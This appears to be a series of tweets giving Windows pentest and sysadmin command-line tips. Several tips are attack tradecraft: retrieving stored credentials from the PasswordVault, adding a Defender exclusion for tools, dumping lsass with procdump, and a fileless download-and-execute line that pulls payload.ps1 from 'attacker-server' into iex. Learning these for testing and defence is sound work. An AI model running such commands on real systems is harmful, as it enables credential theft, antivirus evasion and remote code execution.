I did a talk on Windows priv escalation pentest techniques. Used some inbuilt commands. https://t.co/b3gQrCRvUx #pentest #windows #security

Retrieve credentials stored in the Win Credential Locker PS C:\> [ https://t.co/dhH6Bm4zQt.Credentials.PasswordVault,.,ContentType=WindowsRuntime] PS C:\> (New-Object https://t.co/dhH6Bm4zQt.Credentials.PasswordVault).RetrieveAll() #oscp #security #pentest #redteam #PowerShell

#Powershell get list of processes with command line & username PS C:\> gwmi win32_process|select processid,name,commandline,path,@{name="username";ex={$_.getowner().user}} add -ComputerName "NAME-HERE" to gwmi to run this remotely #security #malware #pentest #redteam #blueteam

From thick #client #exploitation to becoming #Kubernetes cluster Admin  - The story of a fun bug we found and it's exploitation https://t.co/EAPlc74njB #k8s #windows #privilege #escalation #sysinternals #penetration #pentest cc @appseccouk

#Powershell script to fetch missing #Windows updates PS C:\> (New-Object -ComObject microsoft.update.session).CreateUpdateSearcher().Search("IsHidden=0 and IsInstalled=0").Updates | select Title,RebootRequired,CVEIds,IsMandatory #security #Microsoft #security #pentest #redteam

Add a file/folder to #Windows Defender exclusion list C:\>powershell -exec bypass - "Add-MpPreference -ExclusionPath 'D:\EvilFolder\Tools'" useful if you want to move #pentest tools to a Windows machine without Defender interfering Admin UAC prompt required #powershell #oscp

Get a list of IPs connected via #RDP so far PS C:\> Get-WinEvent -Log 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' | select -exp Properties | where {$_.Value -like '*.*.*.*' } | sort Value -u #sysadmin #PowerShell #audit #blueteam

Happy new year! Map #Sysinternals tools folder locally, run tools when required. Useful on a compromised remote machine to avoid tool clutter. net use Z: \\ https://t.co/CP83SaQ7we\tools\ "/user:" dir Z: Z:\procdump -accepteula -ma lsass.exe lsassdmp #pentest #sysadmin #redteam

Download and execute a #PowerShell script without touching the disk (fileless). powershell -exec bypass -c "iwr(' http://attacker-server/payload.ps1')|iex" #pentest #postexploitation #oscp

Display list of blocked ports on the #firewall using #powershell. Add other attributes to 'select' to increase verbosity. PS C:\> $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports #sysadmin #windows

Set IP address using #netsh. Needs elevation. Fetch all interface names: C:\> netsh interface ip show interfaces Set a IP address & gateway: C:\> netsh interface ip add address name="Wi-Fi" addr=192.168.100.200 mask=255.255.255.0 gateway=192.168.100.1 gwmetric=2000

Enable RDP remotely via #wmic on #Windows 2008 and above: C:\> wmic /namespace:\\root\CIMV2\TerminalServices PATH Win32_TerminalServiceSetting WHERE (__CLASS !="") CALL SetAllowTSConnections 1

Stop #Badrabbit Elevatd cmd in C:\Windows\ echo "" > infpub.dat echo "" > cscc.dat cacls infpub.dat /D everyone cacls cscc.dat /D everyone

Wrote a post on executing Windows binaries through #WSL. Lots of commands. Was trying to setup a PoC for #bashware: https://t.co/qi6IbYSRwv

List installed progrms,version & path C:\> wmic product get name, version, installlocation wmic product get /? #pentest #exploit #privesc

Enable #RDP reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f #PenTest

Find unquoted services for #windows #privesc: C:\> wmic service get displayname,pathname|findstr /IV "C:\Windows"|findstr /IV """ #pentest

Disable SMBv1 (apart frm patching MS17-010) to prevent #wannacrypt: C:\> dism /online /norestart /disable-feature /featurename:SMB1Protocol

En(Dis)able features using the Deployment Image Servicing & Management tool: C:\> dism /online /enable-feature /featurename:TFTP #PenTest

[UAC] Enable ps-remoting on remote sys via #wmic C:\> wmic /node:ip process call create "powershell enable-psremoting -force" #WinRM

Delete all #InternetExplorer history, cookies, form data, pwds & temporary files. C:\> rundll32.exe inetcpl.cpl,ClearMyTracksByProcess 255